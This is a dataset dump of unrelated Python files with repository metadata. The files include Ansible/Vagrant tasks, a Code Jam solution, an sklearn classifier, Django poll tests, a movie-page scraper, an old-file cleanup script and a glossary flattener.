from multiprocessing import cpu_count, Pool
from auto_tqdm import tqdm
from notipy_me import Notipy
def score(data):
    """Run the greedy_grasp_ant binary on one data file and collect its means.

    Parameters
    ----------
    data : str
        File name inside the ``data/`` directory.

    Returns
    -------
    pandas.DataFrame
        One-row frame (indexed by ``data``) holding the run's "mean" column.
    """
    # FIX: renamed the local from ``csv`` — it shadowed the stdlib module name.
    log_path = "scores/{data}.csv".format(data=data)
    subprocess.run([
        "./gga/greedy_grasp_ant",
        "--data=data/{data}".format(data=data),
        "--log={log_path}".format(log_path=log_path),
        "--all"
    ])
    df = pd.read_csv(log_path, index_col=0)[["mean"]]
    df.columns = [data]
    return df.T
data = os.listdir("data")
# Notipy sends a notification when the run completes; the process pool fans
# score() out over every data file, one worker per CPU core.
with Notipy():
    with Pool(cpu_count()) as p:
        df = pd.concat(list(tqdm(p.imap(score, data), total=len(data))))
    df.to_csv("scores/all_scores.csv")
| [
"cappelletti.luca94@gmail.com"
] | cappelletti.luca94@gmail.com |
b74ad33e632198ba342a255f54d4a25b1116e952 | e040e5f33a443fa8ca313968a97471cf9d9db87c | /vagrant/tasks.py | 7094094b2f8d5d55fb20e7f4d2c1131ddd72ff8f | [] | no_license | chrisseto/Archiver | 63605e977849274648195b231b06849e4f365152 | 849e30dd0f6fe177ecd0efd94a2b55d7993ebe02 | HEAD | 2016-09-11T06:34:50.692644 | 2014-09-04T19:46:41 | 2014-09-04T19:46:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,361 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from invoke import run, task
@task
def provision(inventory='hosts', user='vagrant', sudo=True, verbose=False, extra='', key='~/.vagrant.d/insecure_private_key'):
    """Run the site.yml playbook given an inventory file and a user. Defaults
    to provisioning the vagrant box.
    """
    # Thin wrapper around play() pinned to the site.yml playbook.
    play(playbook='site.yml',
         inventory=inventory,
         user=user,
         sudo=sudo,
         verbose=verbose, extra=extra, key=key)
@task
def play(playbook, inventory='hosts', user='vagrant', sudo=True, verbose=False, extra='', key=''):
    """Run a playbook. Defaults to using the vagrant inventory and vagrant user."""
    print('[invoke] Playing {0!r} on {1!r} with user {2!r}...'.format(
        playbook, inventory, user))
    # Base command first (locals() here holds exactly the parameters),
    # then append each optional flag that is enabled.
    cmd = 'ansible-playbook {playbook} -i {inventory} -u {user}'.format(**locals())
    flags = []
    if sudo:
        flags.append(' -s')
    if verbose:
        flags.append(' -vvvv')
    if key:
        flags.append(' --private-key=%s' % key)
    if extra:
        flags.append(' -e {0!r}'.format(extra))
    cmd += ''.join(flags)
    print('[invoke] {0!r}'.format(cmd))
    run(cmd, pty=True)
@task
def update():
    # Re-run only the tasks tagged 'update' against the vagrant box.
    run('ansible-playbook site.yml -i hosts -u vagrant --private-key ~/.vagrant.d/insecure_private_key -s --tags update', pty=True)
@task
def vagrant_recycle():
    # Destroy, recreate and re-provision the vagrant box from scratch.
    run('vagrant destroy -f')
    run('vagrant up')
    provision()
| [
"Chriskseto@gmail.com"
] | Chriskseto@gmail.com |
46716e05f494d85df10a692e589e37f999ee1bdd | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/CJ/16_0_2_anrieff_b.py | 9217d8d49f04d08baad00e10f7695015df8cedd7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 570 | py | #!/usr/bin/env python
# Contestant: Veselin 'anrieff' Georgiev
# Round: Google Code Jam Qualification 2016
# Task: B. Revenge of the pancakes
# Solution: Greedy. At each step, find the largest single-colored block at the top, and flip it, until we finish.
TC = int(raw_input().strip())
for tc in xrange(1, TC + 1):
print "Case #%d:" % tc,
a = list(raw_input().strip())
n = len(a)
steps = 0
while a.count('-') != 0:
steps += 1
i = 0
while i < n and a[i] == a[0]:
i += 1
for j in xrange(i):
a[j] = '-' if a[j] == '+' else '+' # reverse
print steps
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
89dffaba38711b93fdcb658ebbf0b28432889f78 | 113b962bd5e2eb770067bd374a15dfe8a1c2d09f | /py_scripts/get_mappedcount_byLibID.py | 8a5cee444afcf4ef2e1d1d2b47beaaa11f6be665 | [] | no_license | aungthurhahein/biotech_script | ecce51950bcef69405843da12ece2f84ea5541d6 | 2fda699343e6c46543fa1df2412c8ca2f2622cda | refs/heads/master | 2020-12-24T06:20:13.028141 | 2016-07-06T15:23:34 | 2016-07-06T15:23:34 | 25,574,741 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | """
# get occurences of ref_ids by Lib_IDs
# modification tips: file type, column of file ids
# __author__ = 'atrx'
# Date: 22012015
"""
import sys
from Bio import SeqIO
usage = "Usage %s infile" % sys.argv[0] # specific massage for no input
try:
fastafile = sys.argv[1]
contigid = sys.argv[2]
except:
print usage, sys.exit(1)
fasta_file = open(fastafile, 'r')
ref_file = open(contigid, 'r')
id_list = []
contig_list = []
id_key = []
for l in ref_file:
id = l.split()
id_list.append(l)
id_key.append(id[1].strip())
for seq in SeqIO.parse(fasta_file, "fasta"):
contig_list.append(seq.id)
for seq_record in contig_list:
contigid = seq_record.strip()
if contigid in id_key:
lo = id_key.index(contigid)
print id_list[lo].strip()
else:
print "0 " + seq_record
| [
"aungthurhahein@gmail.com"
] | aungthurhahein@gmail.com |
6d9695e33af76ad842572e35c2345d53cbad1a2a | 1b10cfc8ed350baea39e4d265d2378c3da4cd994 | /plugin-sim/local.py | 2c07a963cdc79cf8adee95b46bade25d12f3d13d | [
"MIT"
] | permissive | albertcrowley/coinstac-search | e382cc0ec401d42fd75a548e9f8d014b5fc02387 | 731d38644e1c7dc4c9b65fb986c824ed11a33e8c | refs/heads/master | 2020-03-29T23:16:00.571684 | 2020-02-24T19:52:01 | 2020-02-24T19:52:01 | 150,464,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,000 | py | #!/usr/bin/python
import subprocess
import sys
import json
import os
from nidm.experiment.tools.rest import RestParser
# Inside the debug container the project is mounted at /opt/project;
# otherwise resolve data files relative to the working directory.
if 'DEBUG' in os.environ and os.environ['DEBUG'] == "1":
    directory = '/opt/project/'
else:
    directory = './'
#
# To run as a test:
#
# docker run -e "DEBUG=1" -v /home/crowley/coinstac-search/plugin-sim:/opt/project -w /opt/project -v /tmp:/mnt/data/local.py pynidm python local.py /opt/project/test_input.json
def log(s):
    """Append *s* (plus a newline) to the run log, or echo it when DEBUG=1."""
    if 'DEBUG' in os.environ and os.environ['DEBUG'] == "1":
        print(s)
    else:
        # FIX: use a context manager so the handle is closed even if a
        # write raises; the original opened and closed the file manually.
        with open("/mnt/data/local-log.txt", "a") as f:
            f.write(s)
            f.write("\n")
# Read the JSON message from the file named on the command line, or stdin.
# FIX: the input file is now closed via a context manager.
if len(sys.argv) > 1:
    with open(sys.argv[1]) as infile:
        in_str = infile.read()
else:
    in_str = sys.stdin.read()
log ("\n\n\n------------------------------------------------------------------------\n")
doc = json.loads(in_str)
# FIX: renamed from ``filter`` — the old name shadowed the built-in.
op_filter = doc['input']['operation']
my_client_id = doc['state']['clientId']
log ("\nMy client ID is " + my_client_id) # ex local0
log("\nInput:\n" + in_str)
ttl_file = directory + my_client_id + '.nidm.ttl'
log('TTL File={}'.format(ttl_file))
uri = '/projects/'
restParser = RestParser(output_format=RestParser.OBJECT_FORMAT)
out = restParser.run( [ttl_file], uri )
log (json.dumps(out))
# For each project, run the statistics query and emit one JSON result on
# stdout (COINSTAC reads the pipeline output from stdout).
for project in out:
    uri = '/statistics/projects/{}?{}'.format(project, op_filter)
    log("\n&&& URI: {}\n".format(uri))
    out = restParser.run( [ttl_file], uri)
    output = {"output": {"result": out, "operation": uri}}
    log(json.dumps(output, indent=2))
    sys.stdout.write(json.dumps(output))
# FIX: everything after this exit in the original (a pynidm subprocess
# fallback) was unreachable dead code and has been removed.
sys.exit(0)
| [
"albert.crowley@tcg.com"
] | albert.crowley@tcg.com |
a57dcb96525131d56ec52c5f7b6ad9f742f6b551 | 2f28c2fb7c7322e98ab9954d1c45888dadd0da80 | /src/models/train_model.py | 681422b4f7ade0412828518149c46bba9c5cc67d | [
"MIT"
] | permissive | markanderson96/AMFMBirdActivity | 6dda0fab6590a05342a0cc07428201b2cfda75cc | 5f133b76dd6c85d09313d588df334f0cdb3feb09 | refs/heads/main | 2023-05-02T13:55:36.186033 | 2021-02-09T20:13:28 | 2021-02-09T20:13:28 | 329,428,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,167 | py | #!/bin/python
import pandas as pd
import numpy as np
import yaml
import logging
import sys
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.model_selection import train_test_split, GridSearchCV, cross_val_score, KFold
from sklearn.ensemble import RandomForestClassifier, StackingClassifier
from sklearn.svm import SVC
from sklearn import metrics
from matplotlib import pyplot
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
def main():
    """ Trains model based on parameters in config

    Reads the feature CSV named by the module-level ``config`` mapping,
    fits a random forest, an SVM and a stacking ensemble of the two on an
    80/20 split, and prints a metrics report for each model.
    """
    logger = logging.getLogger(__name__)
    logger.info('training model')
    dataset = config['general']['dataset']
    features = 'data/features/' + dataset + '/features.csv'
    df = pd.read_csv(features, index_col=None)
    # Acoustic feature columns used as model inputs.
    numeric_features = [
        'amFreq',
        'amDepth',
        'amProminence',
        'pitchMean',
        'pitchVar',
        'pitchSkew',
        'pitchKurtosis',
        'spectralCentroidMean',
        'spectralCentroidVar',
        'spectralRolloffMean',
        'spectralRolloffVar'
    ]
    numeric_data = df[numeric_features]
    #basic scaling: median-impute missing values, then standardize
    numerical_transformer = Pipeline(steps=[
        ('Imputer', SimpleImputer(strategy='median', verbose=1)),
        ('Scaler', StandardScaler())],
        verbose=False)
    # Preprocessor operations
    preprocessor = ColumnTransformer(
        transformers=[
            ('Numerical Data', numerical_transformer, numeric_features)
        ],
        verbose=False)
    # Random-forest pipeline; hyperparameters come from the YAML config.
    clf1 = Pipeline(steps=[
        ('Preprocessor', preprocessor),
        ('Random Forest', RandomForestClassifier(verbose=config['classifier']['verbose'],
                                            criterion=config['random_forest']['criterion'],
                                            max_depth=config['random_forest']['max_depth'],
                                            min_samples_leaf=config['random_forest']['min_samples_leaf'],
                                            n_estimators=config['random_forest']['n_estimators'],
                                            class_weight='balanced',
                                            n_jobs=-1))],
        verbose=False)
    # SVM pipeline, likewise configured from the YAML file.
    clf2 = Pipeline(steps=[
        ('Preprocessor', preprocessor),
        ('SVM', SVC(verbose=config['classifier']['verbose'],
                    kernel=config['svm']['kernel'],
                    degree=config['svm']['degree'],
                    gamma=config['svm']['gamma'],
                    probability=config['svm']['probability'],
                    max_iter=config['svm']['max_iter']))],
        verbose=False)
    # put data back together
    x_data = numeric_data
    # labels
    y_data = df['hasBird']
    # Split data 80/20
    x_train, x_test, y_train, y_test = train_test_split(x_data,
                                                        y_data,
                                                        test_size=config['classifier']['test_size'],
                                                        random_state=config['classifier']['random_state'],
                                                        shuffle=config['classifier']['shuffle'])
    # Stacking ensemble of the two pipelines with an SVC meta-learner.
    eclf = StackingClassifier(estimators=[
        ('rf', clf1), ('svm', clf2)],
        final_estimator=SVC(),
        n_jobs=-1,
        passthrough=False,
        verbose=0)
    # Fit and report each model on the held-out split.
    clf1.fit(x_train, y_train)
    y_pred = clf1.predict(x_test)
    print('Random Forest')
    report(y_test, y_pred)
    clf2.fit(x_train, y_train)
    y_pred = clf2.predict(x_test)
    print('SVM')
    report(y_test, y_pred)
    eclf.fit(x_train, y_train)
    y_pred = eclf.predict(x_test)
    print('Combo')
    report(y_test, y_pred)
def report(y_test, y_pred):
    """Print a classification report plus headline metrics for one model."""
    print()
    print(metrics.classification_report(y_test, y_pred, target_names=['noBird', 'bird']))
    # Headline scores, printed in a fixed order:
    # accuracy  - fraction of correct predictions,
    # precision - fraction of predicted positives that are real,
    # recall    - fraction of real positives that were found.
    for label, scorer in (
            ("Accuracy:", metrics.accuracy_score),
            ("Precision:", metrics.precision_score),
            ("Recall:", metrics.recall_score)):
        print(label, scorer(y_test, y_pred))
    # Area under the ROC curve built from the hard binary predictions.
    false_pos_rate, true_pos_rate, _ = metrics.roc_curve(y_test, y_pred)
    print("AUC:", metrics.auc(false_pos_rate, true_pos_rate))
if __name__ == '__main__':
    # Project root is two directories above this file (src/models/...).
    project_dir = Path(__file__).resolve().parents[2]
    log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    logging.basicConfig(level=logging.INFO, format=log_fmt, stream=sys.stderr)
    # load config file (module-global ``config`` is read inside main())
    with open(str(project_dir) + '/config/config.yaml') as file:
        config = yaml.safe_load(file)
    # find .env automagically by walking up directories until it's found, then
    # load up the .env entries as environment variables
    load_dotenv(find_dotenv())
    main() | [
"andersm3@tcd.ie"
] | andersm3@tcd.ie |
a815426cb3f10bd195178efb53da646d401835a2 | 2e888bd174fb9088aea80bca0ca2102c4e418dff | /0x09-python-everything_is_object/100-magic_string.py | 0adac5f3d095862c0d25184336471aeff30aa454 | [] | no_license | mauriciosierrac/holbertonschool-higher_level_programming | 9aea13b9f13b1bc80b0782a0699601294776199a | 4ff2198623eebb238689aed60ea2f064bdb2f705 | refs/heads/master | 2023-04-29T23:54:39.063955 | 2021-05-12T23:41:19 | 2021-05-12T23:41:19 | 319,360,492 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 107 | py | #!/usr/bin/python3
def magic_string(string=[]):
    # NOTE: the mutable default argument is intentional -- the same list
    # object is shared across calls, so every call appends another
    # 'Holberton' and the returned string grows ("Holberton",
    # "Holberton, Holberton", ...). This demonstrates Python's
    # everything-is-an-object / shared-default-argument behaviour;
    # do not "fix" it with the usual `string=None` idiom.
    string += ['Holberton']
    return (', '.join(string))
| [
"2376@holbertonschool.com"
] | 2376@holbertonschool.com |
630d1956e0b63d64523db795b9be2b9148d32cde | 5cb98473ea9972d0a9a0278cde9b6ee8264f9bac | /01. Jump to python/chap05/5_6/260.py | 3716f386db385102e9e74387bd614dd0a58e1cff | [] | no_license | libus1204/bigdata2019 | fd85dbcd8c89db991ab5c3efa11ff85466a823f8 | 5e9a6fa2c340c1fcd2840889ba40c7b805926558 | refs/heads/master | 2020-04-21T10:56:33.519490 | 2019-04-15T05:28:19 | 2019-04-15T05:28:19 | 169,503,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | import time
index = 1
# Infinite counter: print an increasing integer every 5 seconds.
# NOTE: this loop never terminates on its own; interrupt with Ctrl-C.
while True:
    print(index)
    index += 1
    time.sleep(5)
"libus1204@naver.com"
] | libus1204@naver.com |
b1a61ea569ceff44af77a9d5860273ddbd1e7943 | 56a40305c2d71d88562ddd0e448415ab118790f1 | /backend/polls/tests.py | fc6ef19a5630ba278fb02c288434c80169e1b70c | [] | no_license | KatherynRizek/states-countries | e990798ca8d61914eea33b5ca04aea54560ae555 | 1aa0210228d04a902b56ecc45c6d712fc7ebca32 | refs/heads/master | 2021-09-28T11:04:17.893622 | 2018-06-07T14:39:37 | 2018-06-07T14:39:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,034 | py | import datetime
from django.test import TestCase
from django.utils import timezone
from django.urls import reverse
from .models import Question
class QuestionModelTests(TestCase):
    """Unit tests for the Question model's was_published_recently() helper."""

    def test_was_published_recently_with_future_question(self):
        """
        was_published_recently() returns False for questions whose pub_date
        is in the future.
        """
        time = timezone.now() + datetime.timedelta(days=30)
        future_question = Question(pub_date=time)
        self.assertIs(future_question.was_published_recently(), False)

    def test_was_published_recently_with_old_question(self):
        """
        was_published_recently() returns True for questions whose pub_date
        is within the last day (fixture is one second short of 24h old).

        NOTE(review): the method name says "old_question", but the fixture
        and assertion actually cover the *recent* case -- consider renaming
        to test_was_published_recently_with_recent_question to match.
        """
        time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)
        recent_question = Question(pub_date=time)
        self.assertIs(recent_question.was_published_recently(), True)
def create_question(question_text, days):
    """Create and persist a Question with the given text.

    The question is published `days` days offset from now: negative values
    place it in the past, positive values in the future.
    """
    pub_time = timezone.now() + datetime.timedelta(days=days)
    return Question.objects.create(question_text=question_text, pub_date=pub_time)
class QuestionIndexViewTests(TestCase):
    """Tests for the polls index view (latest_question_list context)."""

    def test_no_questions(self):
        """
        If no questions exist, an appropriate message is displayed.
        """
        # Fix: the original closed this docstring with four quotes (""""),
        # which left an unterminated string and was a SyntaxError.
        response = self.client.get(reverse('polls:index'))
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "No polls are available.")
        self.assertQuerysetEqual(response.context['latest_question_list'], [])

    def test_path_question(self):
        """
        Questions with a pub_date in the past are displayed on the index page.

        NOTE(review): method name looks like a typo for test_past_question;
        kept as-is to avoid changing the discovered test name.
        """
        create_question(question_text="Past question.", days=-30)
        response = self.client.get(reverse('polls:index'))
        # Fix: the expected repr was missing its closing '>'.
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question.>']
        )

    def test_future_question(self):
        """
        Questions with a pub_date in the future aren't displayed on the
        index page (only the past question should appear).
        """
        create_question(question_text="Past question.", days=-30)
        create_question(question_text="Future question.", days=30)
        response = self.client.get(reverse('polls:index'))
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question.>']
        )

    def test_two_past_questions(self):
        """
        The questions index page may display multiple questions, newest first.
        """
        create_question(question_text="Past question 1.", days=-30)
        create_question(question_text="Past question 2.", days=-5)
        response = self.client.get(reverse('polls:index'))
        self.assertQuerysetEqual(
            response.context['latest_question_list'],
            ['<Question: Past question 2.>', '<Question: Past question 1.>']
        )
class QuestionDetailViewTests(TestCase):
    """Tests for the polls detail view (per-question page)."""

    def test_future_question(self):
        """
        The detail view of a question with a pub_date in the future
        returns a 404 not found.
        """
        future_question = create_question(question_text='Future question.', days=5)
        url = reverse('polls:detail', args=(future_question.id,))
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)

    def test_past_question(self):
        """
        The detail view of a question with a pub_date in the past
        displays the question's text.
        """
        past_question = create_question(question_text='Past Question.', days=-5)
        url = reverse('polls:detail', args=(past_question.id,))
        response = self.client.get(url)
        self.assertContains(response, past_question.question_text)
"katheryn@kosmond.2ldxhoqz4w0efi5ajh3u0k0m2g.bx.internal.cloudapp.net"
] | katheryn@kosmond.2ldxhoqz4w0efi5ajh3u0k0m2g.bx.internal.cloudapp.net |
1d5145aa4f4e80bb677c962c61230d3e563afccf | 348b807deb1fd6f66538c7c233271a5fb08023e2 | /checking_data_type.py | 9ab4b8bda700050c22099daef9d18e7c4d59a08b | [] | no_license | SparshRajGupta/MyPythonStudy | 6cc25ee134963c7ead47ab67716b30b25f88b739 | 6026c7e23273ca5fe42c06ac1709b42ea0e5675a | refs/heads/master | 2021-01-19T11:23:09.941770 | 2017-06-04T21:44:41 | 2017-06-04T21:44:41 | 87,963,178 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | a = 5
print (a, "is of type",type(a))
b = 3.0
print (b, "is of type",type(b))
c = "Hello"
print (c, "is of type", type(c))
d = 1+2j
print (d,"is complex number?",isinstance(d,complex)) | [
"sparsh.raj.1993@gmail.com"
] | sparsh.raj.1993@gmail.com |
181948742c2599fe0d7f49260c2f25dc93941c71 | 4c37dd485e8415810e7aa5b8dce963f48c9378ba | /singlemovieclawer.py | 672c791d8e1de63b62788fc7697d7ea2ce9729e3 | [] | no_license | biyuxuan12/zona | 0593c6e54938d6c5efba3d5911860e821f6783e0 | 2d033820bb0ae8d14a1c2797bd8a403b2992a183 | refs/heads/master | 2020-04-26T17:01:08.441632 | 2019-03-04T07:55:00 | 2019-03-04T07:55:00 | 173,699,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,174 | py | # -*- coding:utf-8 -*-
import re
import socket
timeout = 100
socket.setdefaulttimeout(timeout)
import threading
import urllib
from urllib import request
from bs4 import BeautifulSoup
import dbsetting
import datetime as dt
import sys
flag=0
dict={}
myclient = dbsetting.myclient
mydb = dbsetting.mydb
# -*- coding: utf-8 -*-
class movieThread (threading.Thread):
    """Worker thread that scrapes one zonatorrent movie page.

    run() downloads self.murl, extracts movie metadata with BeautifulSoup
    and stores the resulting dict in the module-level global `dict`
    (read afterwards by the main script). Network/parse failures are
    logged and swallowed.
    """
    # NOTE(review): Rurl appears unused in this class.
    Rurl = 'https://zonatorrent.tv/letters/'
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}

    def __init__(self, murl):
        threading.Thread.__init__(self)
        self.murl = murl
        # Fix: stop()/stopped() referenced self._stop_event, which was never
        # created, so calling either raised AttributeError.
        self._stop_event = threading.Event()

    def run(self):
        try:
            print(self.murl)
            req = urllib.request.Request(url=self.murl, headers=self.headers)
            response = urllib.request.urlopen(req).read()
            soup = BeautifulSoup(response, "html.parser")
            ablume_type = '0'
            backdrop_path = soup.find("img", attrs={'class': 'TPostBg'})['src']
            bludv_name = soup.find("h1", attrs={'class': 'Title'}).string
            original_title = ''
            director = []
            main_actor = []
            service_type = []
            # The <strong> labels identify director / original title / genre rows.
            temps = soup.find_all("strong")
            for temp in temps:
                if temp.text == 'Director:':
                    director = temp.parent.text.split(":", 1)[1].lstrip().split(",")
                if temp.text == 'Título original:':
                    original_title = temp.parent.text.split(":", 1)[1].lstrip()
                if temp.text == 'Género:':
                    service_type = temp.parent.text.split(":", 1)[1].lstrip().split(",")
            for actor in soup.find_all('figcaption'):
                main_actor.append(actor.text)
            language = ''
            download_url = ''
            if soup.find("tbody"):
                language = soup.find("tbody").tr.td.next_sibling.next_sibling.next_sibling.text.lstrip()
                download_url = [{'name': bludv_name, 'url': soup.find("a", attrs={'class': 'Button STPb torrent-movie'})['href']}]
            if soup.find("div", attrs={'class': 'Description'}).p:
                overview = soup.find("div", attrs={'class': 'Description'}).p.text
            else:
                overview = soup.find("div", attrs={'class': 'Description'}).text
            page_url = self.murl
            poster_path = soup.find("div", attrs={'class': 'Image'}).figure.img['src']
            if soup.find("span", attrs={'class': 'Date AAIco-date_range'}):
                # Site dates are DD-MM-YYYY; normalize to ISO YYYY-MM-DD.
                release_date = soup.find("span", attrs={'class': 'Date AAIco-date_range'}).string
                time = dt.datetime.strptime(release_date, '%d-%m-%Y')
                release_date = time.strftime('%Y-%m-%d')
                year = time.strftime('%Y')
            else:
                release_date = ''
                year = ''
            # Site shows votes as a 0-100 percentage; convert to a 0-10 score.
            vote_average = soup.find("div", attrs={'id': 'TPVotes'})['data-percent']
            vote_average = str(float(vote_average) / 10)
            mydict = {"ablume_type": ablume_type, 'backdrop_path': backdrop_path, 'bludv_name': bludv_name, 'original_title': original_title, 'director': director, 'service_type': service_type,
                      'main_actor': main_actor, 'language': language, 'download_url': download_url, 'overview': overview, 'page_url': page_url, 'poster_path': poster_path, 'release_date': release_date, 'year': year, 'vote_average': vote_average}
            print(mydict)
            # Hand the result back through the module-level global `dict`
            # (shadows the builtin; renaming would require coordinated changes).
            global dict
            dict = mydict
        except Exception as ex:
            print(self.murl + '页数获取失败(可能由于超时等原因)')
            print(ex)

    def stop(self):
        """Request cancellation by setting the stop event."""
        self._stop_event.set()

    def stopped(self):
        """Return True once stop() has been called."""
        return self._stop_event.is_set()
if(len(sys.argv)<1):
sys.exit('请传入需要爬取的url')
print("开始爬取"+sys.argv[1])
print(sys.argv[1])
thread2 = movieThread(sys.argv[1])
thread2.start()
thread2.join()
print(dict)
#以下是把爬取到的结果放进数据库中
mycol = mydb["zonatorrent_movie_info"]
if dict:
if(mycol.find_one({'page_url':dict['page_url']})==None):
mycol.insert(dict)
else:print("数据库中已有此链接") | [
"48197709+biyuxuan12@users.noreply.github.com"
] | 48197709+biyuxuan12@users.noreply.github.com |
ad2e9c6b207b388177519bbb6dfad9c71c71c217 | b78d46eed29dcea6a0679744fcdfecac1e5f15bb | /dir_cleaner/clean.py | db86f1a453e8715935b2164be94224afdd0511c9 | [] | no_license | blzzrd/things-and-stuff | 0ce9a975ef096fddd63b088a9f73e424409ad392 | dd566465a3281de8edf8e42aefebd9a32d32f962 | refs/heads/master | 2020-04-05T09:26:36.226300 | 2019-11-21T22:02:57 | 2019-11-21T22:02:57 | 156,756,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 846 | py | # Import the OS Module, the Time Module, and the System Module.
import os, time, sys
# NOTE(review): `sys` appears unused in this script.

# Get the current working directory.
current_path = os.getcwd()
# Current time in seconds since the epoch.
now = time.time()

# Delete regular files in the current directory whose last-modification
# time is more than 14 days old, counting how many were removed.
files_removed = 0
for files in os.listdir(current_path):
    # Build an absolute path for each directory entry.
    f = os.path.join(current_path, files)
    # Check to see if the entry is older than 14 days (14 days in seconds):
    if os.stat(f).st_mtime < now - (14 * 24 * 60 * 60):
        # .st_atime = time of last access.
        # .st_ctime = time of last change.
        # .st_mtime = time of last modification.
        # If the object is a regular file (not a directory), delete it.
        if os.path.isfile(f):
            os.remove(f)
            files_removed += 1

# Print out your output.
print("{} files removed.".format(files_removed))
| [
"alexcast001@gmail.com"
] | alexcast001@gmail.com |
98b96256d9b49f574f1e9e179f2affae1bc20855 | 4cbb9e2213b04b21ab2f283d29cedb9585b26d9b | /setup.py | a7c929b111a7f8bc253d416c660f9025065d7f6f | [
"MIT"
] | permissive | CostRagno/geopolygon | a859bc1f08623b201ece5605536edbb92bfa1335 | f9113f606866f2f58920cefeebe5a1220b2e5a9e | refs/heads/master | 2020-09-05T08:23:21.720871 | 2019-11-17T10:39:32 | 2019-11-17T10:39:32 | 220,040,015 | 3 | 2 | MIT | 2019-11-17T10:39:34 | 2019-11-06T16:21:07 | Python | UTF-8 | Python | false | false | 2,076 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 6 11:12:50 2019

@author: costantino
"""
# Fix: bare distutils ignores install_requires; use setuptools when
# available so the dependency list is actually honoured by pip.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

setup(
    name='geopolygon',  # package / folder name
    packages=['geopolygon'],
    version='0.1',
    license='MIT',
    description='Python package to retrieve and correctly reshape the polygon of a geographical area',
    author='Costantino Ragno',
    author_email='costantino.ragno@unicam.it',
    url='https://github.com/CostRagno/geopoly',
    download_url='https://github.com/CostRagno/geopoly/archive/v_01.tar.gz',
    keywords=['geoinformation', 'polygons', 'CityPolygons', 'openstreetmap', 'concavehull', 'wikidata'],
    install_requires=[
        # Fix: 'ast' removed -- it is a standard-library module, not a PyPI
        # distribution; listing it broke `pip install geopolygon`.
        'requests',
        'geopy',
        'beautifulsoup4',
        'numpy',
        'wikidata',
        'obspy',
        'scipy',
        'matplotlib',
    ],
    classifiers=[
        'Development Status :: 3 - Alpha',  # "3 - Alpha" / "4 - Beta" / "5 - Production/Stable"
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
)
)
| [
"noreply@github.com"
] | noreply@github.com |
33383a8382f396f8e69cf09f091ef5f293fcf70e | 012a52b4d75673af95c7dfa1dbc59cb9b763edb9 | /ingest/break_down.py | bc37df9178a9a44af2088bc4b363571dfca0e8df | [] | no_license | oracc/oracc-rest | 459f6b252045d8960df5c6394ce4111ae4c9827d | 49fe5d0e445d9823ac0bcc0123b2826cad0fb0dc | refs/heads/development | 2023-08-07T07:50:14.547683 | 2023-05-22T14:20:18 | 2023-05-22T14:20:18 | 113,996,575 | 1 | 0 | null | 2023-07-25T21:16:56 | 2017-12-12T13:55:16 | Python | UTF-8 | Python | false | false | 6,429 | py | """A module for breaking down a glossary into individual entries."""
import json
import os
import subprocess
import sys
import warnings
# By default, we treat most glossary data as strings, but sometimes we want the
# REST API to return a different type (for instance, counts should be integers).
# The below sequences refer to fields in two ways: a field name just by itself
# indicates that the field should be indexed as a string; alternatively, if the
# name is accompanied by a type [e.g. ("icount", int)], that means that its
# values should be converted to the given type.
base_fields = ["project", "lang"] # fields to copy into each entry
direct_fields = ["gw", "headword", "cf", ("icount", int), "id"]
indirect_fields = {
"senses": ["mng"],
"forms": ["n"],
"norms": ["n"],
"periods": ["p"]
}
def name_and_type(field_spec):
    """Split a field spec into (name, type); bare names default to str.

    A spec is either a plain string (the field name, typed as str) or a
    (name, type) pair. Strings must be special-cased rather than unpacked:
    a two-character name like "gw" would otherwise unpack "successfully"
    into ("g", "w").
    """
    if isinstance(field_spec, str):
        return field_spec, str
    spec_name, spec_type = field_spec[0], field_spec[1]
    return spec_name, spec_type
def process_entry(entry):
    """Flatten the nested fields of an entry.

    Copies the direct fields verbatim (with type conversion) and collapses
    each nested section (senses, forms, norms, periods) into a flat
    "<section>_<field>" list.
    """
    flat = {}
    for spec in direct_fields:
        field_name, to_type = name_and_type(spec)
        flat[field_name] = to_type(entry[field_name])
    for section, inner_specs in indirect_fields.items():
        for spec in inner_specs:
            inner_name, to_type = name_and_type(spec)
            # Missing sections yield an empty list rather than a KeyError.
            flat["{}_{}".format(section, inner_name)] = [
                to_type(sub_entry[inner_name])
                for sub_entry in entry.get(section, [])
            ]
    # TODO Consider making this a generator (if too slow for bigger files)?
    return flat
